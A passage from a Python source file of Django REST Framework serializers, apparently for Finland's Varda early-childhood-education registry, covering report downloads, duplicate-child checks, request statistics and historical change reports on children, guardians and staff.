value):\n if value and value not in [report_subtype.value for report_subtype in ExcelReportSubtype]:\n raise ValidationError([ErrorMessages.ER002.value])\n return value\n\n def validate(self, data):\n if not data.get('organisaatio', None) and data['report_type'] not in [ExcelReportType.VUOSIRAPORTTI.value]:\n raise ValidationError({'organisaatio': [ErrorMessages.GE001.value]})\n return data\n\n @swagger_serializer_method(serializer_or_field=serializers.URLField)\n def get_url(self, instance):\n kwargs = self.context['view'].kwargs\n if not kwargs.get('pk', None) or instance.status != ReportStatus.FINISHED.value:\n # Not retrieve or Excel report not finished\n return None\n\n if settings.PRODUCTION_ENV or settings.QA_ENV:\n s3_client = S3Client()\n # Creates a temporary link to the file, which is valid for 10 seconds\n return s3_client.create_presigned_url(get_s3_object_name(instance), expiration=10)\n else:\n return reverse('excel-reports-download', kwargs=kwargs, request=self.context['request'])\n\n def get_password(self, instance):\n return decrypt_excel_report_password(instance.password, instance.id)\n\n\nclass DuplicateLapsiVarhaiskasvatuspaatosSerializer(serializers.ModelSerializer):\n varhaiskasvatussuhde_list = serializers.SerializerMethodField()\n\n class Meta:\n model = Varhaiskasvatuspaatos\n fields = ('id', 'varhaiskasvatussuhde_list',)\n\n @swagger_serializer_method(serializer_or_field=serializers.ListField(child=serializers.IntegerField()))\n def get_varhaiskasvatussuhde_list(self, instance):\n return instance.varhaiskasvatussuhteet.values_list('id', flat=True)\n\n\nclass DuplicateLapsiLapsiSerializer(serializers.ModelSerializer):\n varhaiskasvatuspaatos_list = DuplicateLapsiVarhaiskasvatuspaatosSerializer(many=True,\n source='varhaiskasvatuspaatokset')\n maksutieto_list = serializers.SerializerMethodField()\n\n class Meta:\n model = Lapsi\n fields = ('id', 'varhaiskasvatuspaatos_list', 
'maksutieto_list',)\n\n @swagger_serializer_method(serializer_or_field=serializers.ListField(child=serializers.IntegerField()))\n def get_maksutieto_list(self, instance):\n maksutieto_id_set = set(instance.huoltajuussuhteet.values_list('maksutiedot__id', flat=True).distinct('id'))\n # There may be None values if Huoltajuussuhde does not have related Maksutieto objects\n maksutieto_id_set.discard(None)\n return maksutieto_id_set\n\n\nclass DuplicateLapsiSerializer(serializers.Serializer):\n henkilo_id = serializers.CharField(source='henkilo.id')\n etunimet = serializers.CharField(source='henkilo.etunimet')\n kutsumanimi = serializers.CharField(source='henkilo.kutsumanimi')\n sukunimi = serializers.CharField(source='henkilo.sukunimi')\n henkilo_oid = serializers.CharField(source='henkilo.henkilo_oid')\n henkilotunnus = serializers.SerializerMethodField()\n vakatoimija_id = serializers.CharField(source='vakatoimija.id')\n vakatoimija_nimi = serializers.CharField(source='vakatoimija.nimi')\n vakatoimija_oid = serializers.CharField(source='vakatoimija.organisaatio_oid')\n lapsi_list = DuplicateLapsiLapsiSerializer(many=True)\n\n class Meta:\n fields = ('henkilo_id', 'etunimet', 'kutsumanimi', 'sukunimi', 'henkilo_oid', 'henkilotunnus',\n 'vakatoimija_id', 'vakatoimija_nimi', 'vakatoimija_oid',)\n\n def to_representation(self, instance):\n instance['henkilo'] = Henkilo.objects.get(id=instance['henkilo'])\n instance['vakatoimija'] = Organisaatio.objects.get(id=instance['vakatoimija'])\n instance['lapsi_list'] = instance['henkilo'].lapsi.filter(vakatoimija=instance['vakatoimija'])\n return super().to_representation(instance)\n\n def get_henkilotunnus(self, instance):\n try:\n decrypted_hetu = decrypt_henkilotunnus(instance['henkilo'].henkilotunnus, henkilo_id=instance['henkilo'].id)\n return decrypted_hetu\n except CustomServerErrorException:\n return None\n\n\nclass TransferOutageReportSerializer(serializers.Serializer):\n user_id = serializers.IntegerField(source='user__id', allow_null=True)\n username = serializers.CharField(source='user__username', allow_null=True)\n vakajarjestaja_id = serializers.IntegerField(source='vakajarjestaja__id', allow_null=True)\n vakajarjestaja_nimi = serializers.CharField(source='vakajarjestaja__nimi', allow_null=True)\n vakajarjestaja_oid = serializers.CharField(source='vakajarjestaja__organisaatio_oid', allow_null=True)\n lahdejarjestelma = serializers.CharField(allow_null=True)\n last_successful_max = serializers.DateTimeField(allow_null=True)\n last_unsuccessful_max = serializers.DateTimeField(allow_null=True)\n\n\nclass RequestCountSerializer(serializers.ModelSerializer):\n successful = serializers.SerializerMethodField()\n\n class Meta:\n model = Z6_RequestCount\n fields = ('request_url_simple', 'request_method', 'response_code', 'count', 'successful')\n\n @swagger_serializer_method(serializer_or_field=serializers.BooleanField)\n def get_successful(self, instance):\n return instance.response_code in SUCCESSFUL_STATUS_CODE_LIST\n\n\nclass RequestSummarySerializer(serializers.ModelSerializer):\n user_id = serializers.IntegerField(source='user.id', allow_null=True)\n username = serializers.CharField(source='user.username', allow_null=True)\n vakajarjestaja_id = serializers.IntegerField(source='vakajarjestaja.id', allow_null=True)\n vakajarjestaja_nimi = serializers.CharField(source='vakajarjestaja.nimi', allow_null=True)\n vakajarjestaja_oid = serializers.CharField(source='vakajarjestaja.organisaatio_oid', allow_null=True)\n ratio = serializers.FloatField()\n 
request_counts = serializers.SerializerMethodField()\n\n class Meta:\n model = Z6_RequestSummary\n fields = ('user_id', 'username', 'vakajarjestaja_id', 'vakajarjestaja_nimi', 'vakajarjestaja_oid',\n 'lahdejarjestelma', 'request_url_simple', 'summary_date', 'successful_count', 'unsuccessful_count',\n 'ratio', 'request_counts',)\n\n @swagger_serializer_method(serializer_or_field=RequestCountSerializer)\n def get_request_counts(self, instance):\n request_count_qs = instance.request_counts.all().order_by('-count')\n return RequestCountSerializer(request_count_qs, many=True).data\n\n\nclass RequestCountGroupSerializer(serializers.Serializer):\n request_url_simple = serializers.CharField()\n request_method = serializers.CharField()\n response_code = serializers.IntegerField()\n count = serializers.IntegerField(source='sum')\n successful = serializers.SerializerMethodField()\n\n @swagger_serializer_method(serializer_or_field=serializers.BooleanField)\n def get_successful(self, instance):\n return instance['response_code'] in SUCCESSFUL_STATUS_CODE_LIST\n\n\nclass RequestSummaryGroupSerializer(serializers.Serializer):\n user_id = serializers.IntegerField(source='user__id', allow_null=True)\n username = serializers.CharField(source='user__username', allow_null=True)\n vakajarjestaja_id = serializers.IntegerField(source='vakajarjestaja__id', allow_null=True)\n vakajarjestaja_nimi = serializers.CharField(source='vakajarjestaja__nimi', allow_null=True)\n vakajarjestaja_oid = serializers.CharField(source='vakajarjestaja__organisaatio_oid', allow_null=True)\n lahdejarjestelma = serializers.CharField(allow_null=True)\n request_url_simple = serializers.CharField(allow_null=True)\n ratio = serializers.FloatField()\n successful_count = serializers.IntegerField(source='successful_sum')\n unsuccessful_count = serializers.IntegerField(source='unsuccessful_sum')\n request_counts = serializers.SerializerMethodField()\n\n @swagger_serializer_method(serializer_or_field=RequestCountGroupSerializer)\n def get_request_counts(self, instance):\n request_count_qs = (Z6_RequestCount.objects\n .filter(request_summary__id__in=instance['id_list'])\n .values('request_url_simple', 'request_method', 'response_code')\n .annotate(sum=Sum('count'))\n .values('request_url_simple', 'request_method', 'response_code', 'sum')\n .order_by('-sum'))\n return RequestCountGroupSerializer(request_count_qs, many=True).data\n\n\nclass HistoricalBaseSerializer(serializers.Serializer):\n action = serializers.SerializerMethodField()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if 'view' in self.context:\n # view is not present in context in Swagger\n self.datetime_gt = self.context['view'].datetime_gt\n self.datetime_lte = self.context['view'].datetime_lte\n self.secondary_muutos_pvm = None\n\n def get_action(self, instance):\n if instance.history_type == '-':\n return ChangeType.DELETED.value\n if self.datetime_gt < instance.luonti_pvm <= self.datetime_lte:\n return ChangeType.CREATED.value\n if (getattr(instance, 'last_parent_id', None) is not None and\n getattr(instance, 'previous_parent_id', None) is not None and\n instance.last_parent_id != instance.previous_parent_id):\n return ChangeType.MOVED.value\n if self.datetime_gt < instance.muutos_pvm <= self.datetime_lte:\n return ChangeType.MODIFIED.value\n\n # Also verify secondary muutos_pvm (Henkilo.muutos_pvm for Lapsi, Huoltaja and Tyontekija objects)\n if self.secondary_muutos_pvm and self.datetime_gt < self.secondary_muutos_pvm <= self.datetime_lte:\n 
return ChangeType.MODIFIED.value\n\n return ChangeType.UNCHANGED.value\n\n\nclass TkBaseListSerializer(serializers.ListSerializer):\n def to_representation(self, data):\n # Remove instances that have been added and deleted during the time range\n datetime_gt = self.context['view'].datetime_gt\n data = [instance for instance in data\n if instance.history_type != '-' or (instance.history_type == '-' and instance.luonti_pvm < datetime_gt)]\n\n return super().to_representation(data)\n\n\nclass TkToiminnallinenPainotusSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n class Meta:\n model = ToiminnallinenPainotus\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'toimintapainotus_koodi', 'alkamis_pvm', 'paattymis_pvm')\n\n\nclass TkKielipainotusSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n class Meta:\n model = KieliPainotus\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'kielipainotus_koodi', 'alkamis_pvm', 'paattymis_pvm')\n\n\nclass TkToimipaikkaSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n toiminnalliset_painotukset = serializers.SerializerMethodField()\n kielipainotukset = serializers.SerializerMethodField()\n\n class Meta:\n model = Toimipaikka\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'nimi', 'organisaatio_oid', 'kunta_koodi', 'sahkopostiosoite', 'kayntiosoite',\n 'kayntiosoite_postinumero', 'kayntiosoite_postitoimipaikka', 'postiosoite', 'postinumero',\n 'postitoimipaikka', 'puhelinnumero', 'kasvatusopillinen_jarjestelma_koodi', 'toimintamuoto_koodi',\n 'asiointikieli_koodi', 'jarjestamismuoto_koodi', 'varhaiskasvatuspaikat', 'alkamis_pvm',\n 'paattymis_pvm', 'toiminnalliset_painotukset', 'kielipainotukset')\n\n @swagger_serializer_method(serializer_or_field=TkToiminnallinenPainotusSerializer)\n def get_toiminnalliset_painotukset(self, instance):\n painotus_qs = (ToiminnallinenPainotus.history\n .filter(toimipaikka_id=instance.id, history_date__gt=self.datetime_gt,\n history_date__lte=self.datetime_lte).distinct('id').order_by('id', '-history_date'))\n return TkToiminnallinenPainotusSerializer(painotus_qs, many=True, context=self.context).data\n\n @swagger_serializer_method(serializer_or_field=TkKielipainotusSerializer)\n def get_kielipainotukset(self, instance):\n painotus_qs = (KieliPainotus.history\n .filter(toimipaikka_id=instance.id, history_date__gt=self.datetime_gt,\n history_date__lte=self.datetime_lte).distinct('id').order_by('id', '-history_date'))\n return TkKielipainotusSerializer(painotus_qs, many=True, context=self.context).data\n\n\nclass TkTilapainenHenkilostoSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n class Meta:\n model = TilapainenHenkilosto\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'kuukausi', 'tuntimaara', 'tyontekijamaara')\n\n\nclass TkOrganisaatiotSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n toimipaikat = serializers.SerializerMethodField()\n tilapainen_henkilosto = serializers.SerializerMethodField()\n\n class Meta:\n model = Organisaatio\n fields = ('id', 'action', 'nimi', 'organisaatio_oid', 'y_tunnus', 'kunta_koodi', 'sahkopostiosoite',\n 'kayntiosoite', 'kayntiosoite_postinumero', 'kayntiosoite_postitoimipaikka', 'postiosoite',\n 'postinumero', 'postitoimipaikka', 'puhelinnumero', 'ytjkieli', 'yritysmuoto', 'organisaatiotyyppi',\n 'alkamis_pvm', 'paattymis_pvm', 'toimipaikat', 'tilapainen_henkilosto')\n\n 
@swagger_serializer_method(serializer_or_field=TkToimipaikkaSerializer)\n def get_toimipaikat(self, instance):\n id_qs = get_related_object_changed_id_qs(Toimipaikka.get_name(), self.datetime_gt, self.datetime_lte,\n additional_filters=Q(parent_instance_id=instance.id))\n\n last_parent_subquery = get_history_value_subquery(Toimipaikka, 'vakajarjestaja_id', self.datetime_lte)\n previous_parent_subquery = get_history_value_subquery(Toimipaikka, 'vakajarjestaja_id', self.datetime_gt)\n toimipaikka_qs = (Toimipaikka.history.filter(id__in=Subquery(id_qs), vakajarjestaja_id=instance.id,\n history_date__lte=self.datetime_lte)\n .annotate(last_parent_id=last_parent_subquery, previous_parent_id=previous_parent_subquery)\n .filter(last_parent_id=instance.id)\n .distinct('id').order_by('id', '-history_date'))\n return TkToimipaikkaSerializer(toimipaikka_qs, many=True, context=self.context).data\n\n @swagger_serializer_method(serializer_or_field=TkTilapainenHenkilostoSerializer)\n def get_tilapainen_henkilosto(self, instance):\n last_parent_subquery = get_history_value_subquery(TilapainenHenkilosto, 'vakajarjestaja_id', self.datetime_lte)\n previous_parent_subquery = get_history_value_subquery(TilapainenHenkilosto, 'vakajarjestaja_id', self.datetime_gt)\n tilapainen_henkilosto_qs = (TilapainenHenkilosto.history\n .filter(vakajarjestaja_id=instance.id, history_date__gt=self.datetime_gt,\n history_date__lte=self.datetime_lte)\n .annotate(last_parent_id=last_parent_subquery,\n previous_parent_id=previous_parent_subquery)\n .filter(last_parent_id=instance.id)\n .distinct('id').order_by('id', '-history_date'))\n return TkTilapainenHenkilostoSerializer(tilapainen_henkilosto_qs, many=True, context=self.context).data\n\n\nclass TkVakasuhdeSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n class Meta:\n model = Varhaiskasvatussuhde\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'toimipaikka_id', 'alkamis_pvm', 'paattymis_pvm',)\n\n\nclass TkVakapaatosSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n varhaiskasvatussuhteet = serializers.SerializerMethodField()\n\n class Meta:\n model = Varhaiskasvatuspaatos\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'pikakasittely_kytkin', 'vuorohoito_kytkin', 'paivittainen_vaka_kytkin',\n 'kokopaivainen_vaka_kytkin', 'tilapainen_vaka_kytkin', 'jarjestamismuoto_koodi',\n 'tuntimaara_viikossa', 'hakemus_pvm', 'alkamis_pvm', 'paattymis_pvm', 'varhaiskasvatussuhteet',)\n\n @swagger_serializer_method(serializer_or_field=TkVakasuhdeSerializer)\n def get_varhaiskasvatussuhteet(self, instance):\n vakasuhde_qs = (Varhaiskasvatussuhde.history\n .filter(varhaiskasvatuspaatos_id=instance.id, history_date__gt=self.datetime_gt,\n history_date__lte=self.datetime_lte).distinct('id').order_by('id', '-history_date'))\n return TkVakasuhdeSerializer(vakasuhde_qs, many=True, context=self.context).data\n\n\nclass TkHuoltajuussuhdeSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n etunimet = serializers.CharField(source='henkilo_instance.etunimet', allow_null=True)\n sukunimi = serializers.CharField(source='henkilo_instance.sukunimi', allow_null=True)\n henkilo_oid = serializers.CharField(source='henkilo_instance.henkilo_oid', allow_null=True)\n henkilotunnus = serializers.SerializerMethodField()\n katuosoite = serializers.CharField(source='henkilo_instance.katuosoite', allow_null=True)\n postinumero = serializers.CharField(source='henkilo_instance.postinumero', allow_null=True)\n 
postitoimipaikka = serializers.CharField(source='henkilo_instance.postitoimipaikka', allow_null=True)\n\n class Meta:\n model = Huoltajuussuhde\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'etunimet', 'sukunimi', 'henkilo_oid', 'henkilotunnus', 'katuosoite',\n 'postinumero', 'postitoimipaikka',)\n\n def to_representation(self, instance):\n # Get henkilo data from history table or actual table (history is incomplete in test environments)\n henkilo = (Henkilo.history.filter(id=instance.henkilo_id, history_date__lte=self.datetime_lte)\n .distinct('id').order_by('id', '-history_date').first())\n if not henkilo:\n henkilo = Henkilo.objects.filter(id=instance.henkilo_id).first()\n self.secondary_muutos_pvm = getattr(henkilo, 'muutos_pvm', None)\n instance.henkilo_instance = henkilo\n\n return super().to_representation(instance)\n\n def get_henkilotunnus(self, instance):\n henkilotunnus = getattr(instance.henkilo_instance, 'henkilotunnus', None)\n henkilo_id = getattr(instance.henkilo_instance, 'id', None)\n return decrypt_henkilotunnus(henkilotunnus, henkilo_id=henkilo_id, raise_error=False)\n\n\nclass TkMaksutietoHuoltajaSerializer(serializers.Serializer):\n henkilo_oid = serializers.CharField()\n henkilotunnus = serializers.CharField()\n\n\nclass TkMaksutietoSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n huoltajat = serializers.SerializerMethodField()\n\n class Meta:\n model = Maksutieto\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'maksun_peruste_koodi', 'perheen_koko', 'asiakasmaksu', 'palveluseteli_arvo',\n 'alkamis_pvm', 'paattymis_pvm', 'huoltajat',)\n\n @swagger_serializer_method(serializer_or_field=TkMaksutietoHuoltajaSerializer)\n def get_huoltajat(self, instance):\n # Get data of Henkilo objects that are related to the Maksutieto object during the time window\n # Get henkilo data from history table or actual table (history is incomplete in test environments)\n # We need to join historical tables so raw SQL query is simpler\n with connection.cursor() as cursor:\n cursor.execute('''\n SELECT DISTINCT ON(hhu.henkilo_id) hhu.henkilo_id, hhe.henkilo_oid, he.henkilo_oid, hhe.henkilotunnus, he.henkilotunnus\n FROM varda_historicalmaksutietohuoltajuussuhde hmhs\n LEFT JOIN varda_historicalhuoltajuussuhde hhs ON hmhs.huoltajuussuhde_id = hhs.id\n LEFT JOIN varda_historicalhuoltaja hhu ON hhs.huoltaja_id = hhu.id\n LEFT JOIN varda_historicalhenkilo hhe ON hhe.id = hhu.henkilo_id\n LEFT JOIN varda_henkilo he ON he.id = hhu.henkilo_id\n WHERE hmhs.maksutieto_id = %s AND hmhs.history_date <= %s\n ORDER BY hhu.henkilo_id, hhe.history_date DESC;\n ''', [instance.id, self.datetime_lte])\n\n huoltaja_list = [{'henkilo_oid': result[1] or result[2],\n 'henkilotunnus': (decrypt_henkilotunnus(result[3], henkilo_id=result[0], raise_error=False) or\n decrypt_henkilotunnus(result[4], henkilo_id=result[0], raise_error=False))}\n for result in cursor.fetchall()]\n return TkMaksutietoHuoltajaSerializer(huoltaja_list, many=True).data\n\n\nclass TkVakatiedotSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n etunimet = serializers.CharField(source='henkilo_instance.etunimet', allow_null=True)\n sukunimi = serializers.CharField(source='henkilo_instance.sukunimi', allow_null=True)\n henkilo_oid = serializers.CharField(source='henkilo_instance.henkilo_oid', allow_null=True)\n henkilotunnus = serializers.SerializerMethodField()\n syntyma_pvm = serializers.DateField(source='henkilo_instance.syntyma_pvm', 
allow_null=True)\n sukupuoli_koodi = serializers.CharField(source='henkilo_instance.sukupuoli_koodi', allow_null=True)\n aidinkieli_koodi = serializers.CharField(source='henkilo_instance.aidinkieli_koodi', allow_null=True)\n kotikunta_koodi = serializers.CharField(source='henkilo_instance.kotikunta_koodi', allow_null=True)\n katuosoite = serializers.CharField(source='henkilo_instance.katuosoite', allow_null=True)\n postinumero = serializers.CharField(source='henkilo_instance.postinumero', allow_null=True)\n postitoimipaikka = serializers.CharField(source='henkilo_instance.postitoimipaikka', allow_null=True)\n varhaiskasvatuspaatokset = serializers.SerializerMethodField()\n huoltajat = serializers.SerializerMethodField()\n maksutiedot = serializers.SerializerMethodField()\n\n class Meta:\n model = Lapsi\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'etunimet', 'sukunimi', 'henkilo_oid', 'henkilotunnus', 'syntyma_pvm',\n 'sukupuoli_koodi', 'aidinkieli_koodi', 'kotikunta_koodi', 'katuosoite', 'postinumero',\n 'postitoimipaikka', 'vakatoimija_id', 'paos_kytkin', 'oma_organisaatio_id', 'paos_organisaatio_id',\n 'varhaiskasvatuspaatokset', 'huoltajat', 'maksutiedot',)\n\n def to_representation(self, instance):\n # Get henkilo data from history table or actual table (history is incomplete in test environments)\n henkilo = (Henkilo.history.filter(id=instance.henkilo_id, history_date__lte=self.datetime_lte)\n .distinct('id').order_by('id', '-history_date').first())\n if not henkilo:\n henkilo = Henkilo.objects.filter(id=instance.henkilo_id).first()\n self.secondary_muutos_pvm = getattr(henkilo, 'muutos_pvm', None)\n instance.henkilo_instance = henkilo\n\n # varda_historicallapsi does not contain all vakatoimija_id changes because the field has been updated\n # directly in db, so try to get it from varda_lapsi table\n if not instance.paos_kytkin and not instance.vakatoimija_id:\n instance.vakatoimija_id = getattr(Lapsi.objects.filter(id=instance.id).first(), 'vakatoimija_id', None)\n\n lapsi = super().to_representation(instance)\n return lapsi\n\n def get_henkilotunnus(self, instance):\n henkilotunnus = getattr(instance.henkilo_instance, 'henkilotunnus', None)\n henkilo_id = getattr(instance.henkilo_instance, 'id', None)\n return decrypt_henkilotunnus(henkilotunnus, henkilo_id=henkilo_id, raise_error=False)\n\n @swagger_serializer_method(serializer_or_field=TkVakapaatosSerializer)\n def get_varhaiskasvatuspaatokset(self, instance):\n id_qs = get_related_object_changed_id_qs(Varhaiskasvatuspaatos.get_name(), self.datetime_gt,\n self.datetime_lte, additional_filters=Q(parent_instance_id=instance.id))\n\n last_parent_subquery = get_history_value_subquery(Varhaiskasvatuspaatos, 'lapsi_id', self.datetime_lte)\n previous_parent_subquery = get_history_value_subquery(Varhaiskasvatuspaatos, 'lapsi_id', self.datetime_gt)\n vakapaatos_qs = (Varhaiskasvatuspaatos.history\n .filter(id__in=Subquery(id_qs), lapsi_id=instance.id, history_date__lte=self.datetime_lte)\n .annotate(last_parent_id=last_parent_subquery, previous_parent_id=previous_parent_subquery)\n .filter(last_parent_id=instance.id)\n .distinct('id').order_by('id', '-history_date'))\n return TkVakapaatosSerializer(vakapaatos_qs, many=True, context=self.context).data\n\n @swagger_serializer_method(serializer_or_field=TkHuoltajuussuhdeSerializer)\n def get_huoltajat(self, instance):\n id_tuple = tuple(get_related_object_changed_id_qs(\n Lapsi.get_name(), self.datetime_gt, self.datetime_lte, 
return_value='trigger_instance_id',\n additional_filters=Q(instance_id=instance.id) & Q(trigger_model_name=Huoltajuussuhde.get_name())\n )) or (-1,)\n\n # Get a list of Huoltajuussuhde objects that have been modified, or a related Henkilo object has been modified\n # during the time window\n # We need to join historical tables so raw SQL query is simpler (to get henkilo_id)\n huoltajuussuhde_qs = Huoltajuussuhde.history.raw('''\n SELECT DISTINCT ON (hhs.id) hhs.*, hh.henkilo_id as henkilo_id\n FROM varda_historicalhuoltajuussuhde hhs\n LEFT JOIN varda_historicalhuoltaja hh ON hh.id = hhs.huoltaja_id\n WHERE hhs.lapsi_id = %s AND hhs.id IN %s AND hhs.history_date <= %s\n ORDER BY hhs.id, hhs.history_date DESC;\n ''', [instance.id, id_tuple, self.datetime_lte])\n return TkHuoltajuussuhdeSerializer(huoltajuussuhde_qs, many=True, context=self.context).data\n\n @swagger_serializer_method(serializer_or_field=TkMaksutietoSerializer)\n def get_maksutiedot(self, instance):\n id_qs = get_related_object_changed_id_qs(\n Lapsi.get_name(), self.datetime_gt, self.datetime_lte, return_value='parent_instance_id',\n additional_filters=Q(instance_id=instance.id) & Q(trigger_model_name=MaksutietoHuoltajuussuhde.get_name())\n )\n\n last_parent_subquery = Subquery(\n Z9_RelatedObjectChanged.objects\n .filter(parent_instance_id=OuterRef('id'), parent_model_name=Maksutieto.get_name(),\n history_type='+', changed_timestamp__lte=self.datetime_lte)\n .distinct('parent_instance_id').order_by('parent_instance_id', '-changed_timestamp')\n .values('instance_id')\n )\n previous_parent_subquery = Subquery(\n Z9_RelatedObjectChanged.objects\n .filter(parent_instance_id=OuterRef('id'), parent_model_name=Maksutieto.get_name(),\n history_type='+', changed_timestamp__lte=self.datetime_gt)\n .distinct('parent_instance_id').order_by('parent_instance_id', '-changed_timestamp')\n .values('instance_id')\n )\n maksutieto_qs = (Maksutieto.history.filter(id__in=Subquery(id_qs), history_date__lte=self.datetime_lte)\n .annotate(last_parent_id=last_parent_subquery, previous_parent_id=previous_parent_subquery)\n .filter(last_parent_id=instance.id)\n .distinct('id').order_by('id', '-history_date'))\n return TkMaksutietoSerializer(maksutieto_qs, many=True, context=self.context).data\n\n\nclass TkPidempiPoissaoloSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n class Meta:\n model = PidempiPoissaolo\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'alkamis_pvm', 'paattymis_pvm',)\n\n\nclass TkTyoskentelypaikkaSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n class Meta:\n model = Tyoskentelypaikka\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'toimipaikka_id', 'tehtavanimike_koodi', 'kelpoisuus_kytkin',\n 'kiertava_tyontekija_kytkin', 'alkamis_pvm', 'paattymis_pvm',)\n\n\nclass TkPalvelussuhdeSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n tyoskentelypaikat = serializers.SerializerMethodField()\n pidemmat_poissaolot = serializers.SerializerMethodField()\n\n class Meta:\n model = Palvelussuhde\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'tyosuhde_koodi', 'tyoaika_koodi', 'tutkinto_koodi', 'tyoaika_viikossa',\n 'alkamis_pvm', 'paattymis_pvm', 'tyoskentelypaikat', 'pidemmat_poissaolot',)\n\n @swagger_serializer_method(serializer_or_field=TkTyoskentelypaikkaSerializer)\n def get_tyoskentelypaikat(self, instance):\n tyoskentelypaikka_qs = (Tyoskentelypaikka.history\n 
.filter(palvelussuhde_id=instance.id, history_date__gt=self.datetime_gt,\n history_date__lte=self.datetime_lte)\n .distinct('id').order_by('id', '-history_date'))\n return TkTyoskentelypaikkaSerializer(tyoskentelypaikka_qs, many=True, context=self.context).data\n\n @swagger_serializer_method(serializer_or_field=TkPidempiPoissaoloSerializer)\n def get_pidemmat_poissaolot(self, instance):\n pidempi_poissaolo_qs = (PidempiPoissaolo.history\n .filter(palvelussuhde_id=instance.id, history_date__gt=self.datetime_gt,\n history_date__lte=self.datetime_lte)\n .distinct('id').order_by('id', '-history_date'))\n return TkPidempiPoissaoloSerializer(pidempi_poissaolo_qs, many=True, context=self.context).data\n\n\nclass TkTutkintoSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n class Meta:\n model = Tutkinto\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'tutkinto_koodi',)\n\n\nclass TkTaydennyskoulutusSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n tehtavanimikkeet = serializers.SerializerMethodField()\n\n class Meta:\n model = Taydennyskoulutus\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'nimi', 'suoritus_pvm', 'koulutuspaivia', 'tehtavanimikkeet',)\n\n @swagger_serializer_method(serializer_or_field=serializers.ListField(child=serializers.CharField()))\n def get_tehtavanimikkeet(self, instance):\n # Get list of tehtavanimikkeet that are active during the time window\n # QuerySet may contain duplicates and distinct + annotate is not supported so use set\n return set(TaydennyskoulutusTyontekija.history.values('id')\n .filter(taydennyskoulutus_id=instance.id, tyontekija_id=self.context['tyontekija_id'],\n history_date__lte=self.datetime_lte)\n .annotate(history_type_list=StringAgg('history_type', ','))\n .filter(~(Q(history_type_list__contains='+') & Q(history_type_list__contains='-')))\n .order_by('id').values_list('tehtavanimike_koodi', flat=True))\n\n\nclass TkHenkilostotiedotSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n etunimet = serializers.CharField(source='henkilo_instance.etunimet', allow_null=True)\n sukunimi = serializers.CharField(source='henkilo_instance.sukunimi', allow_null=True)\n henkilo_oid = serializers.CharField(source='henkilo_instance.henkilo_oid', allow_null=True)\n henkilotunnus = serializers.SerializerMethodField()\n syntyma_pvm = serializers.DateField(source='henkilo_instance.syntyma_pvm', allow_null=True)\n aidinkieli_koodi = serializers.CharField(source='henkilo_instance.aidinkieli_koodi', allow_null=True)\n sukupuoli_koodi = serializers.CharField(source='henkilo_instance.sukupuoli_koodi', allow_null=True)\n tutkinnot = serializers.SerializerMethodField()\n palvelussuhteet = serializers.SerializerMethodField()\n taydennyskoulutukset = serializers.SerializerMethodField()\n\n class Meta:\n model = Tyontekija\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'etunimet', 'sukunimi', 'henkilo_oid', 'henkilotunnus', 'syntyma_pvm',\n 'aidinkieli_koodi', 'sukupuoli_koodi', 'vakajarjestaja_id', 'tutkinnot', 'palvelussuhteet',\n 'taydennyskoulutukset',)\n\n def to_representation(self, instance):\n # Get henkilo data from history table or actual table (history is incomplete in test environments)\n henkilo = (Henkilo.history.filter(id=instance.henkilo_id, history_date__lte=self.datetime_lte)\n .distinct('id').order_by('id', '-history_date').first())\n if not henkilo:\n henkilo = Henkilo.objects.filter(id=instance.henkilo_id).first()\n 
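# (added note) attach the resolved Henkilo to the instance so the source='henkilo_instance.*'\n # serializer fields declared above can read the person's name and language data from it\n 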
instance.henkilo_instance = henkilo\n self.secondary_muutos_pvm = getattr(henkilo, 'muutos_pvm', None)\n self.context['tyontekija_id'] = instance.id\n\n return super().to_representation(instance)\n\n def get_henkilotunnus(self, instance):\n henkilotunnus = getattr(instance.henkilo_instance, 'henkilotunnus', None)\n henkilo_id = getattr(instance.henkilo_instance, 'id', None)\n return decrypt_henkilotunnus(henkilotunnus, henkilo_id=henkilo_id, raise_error=False)\n\n @swagger_serializer_method(serializer_or_field=TkTutkintoSerializer)\n def get_tutkinnot(self, instance):\n last_parent_subquery = get_history_value_subquery(Tutkinto, 'vakajarjestaja_id', self.datetime_lte)\n previous_parent_subquery = get_history_value_subquery(Tutkinto, 'vakajarjestaja_id', self.datetime_gt)\n tutkinto_qs = (Tutkinto.history\n .filter(henkilo_id=instance.henkilo_id, vakajarjestaja_id=instance.vakajarjestaja_id,\n history_date__gt=self.datetime_gt, history_date__lte=self.datetime_lte)\n .annotate(last_parent_id=last_parent_subquery, previous_parent_id=previous_parent_subquery)\n .filter(last_parent_id=instance.vakajarjestaja_id)\n .distinct('id').order_by('id', '-history_date'))\n return TkTutkintoSerializer(tutkinto_qs, many=True, context=self.context).data\n\n 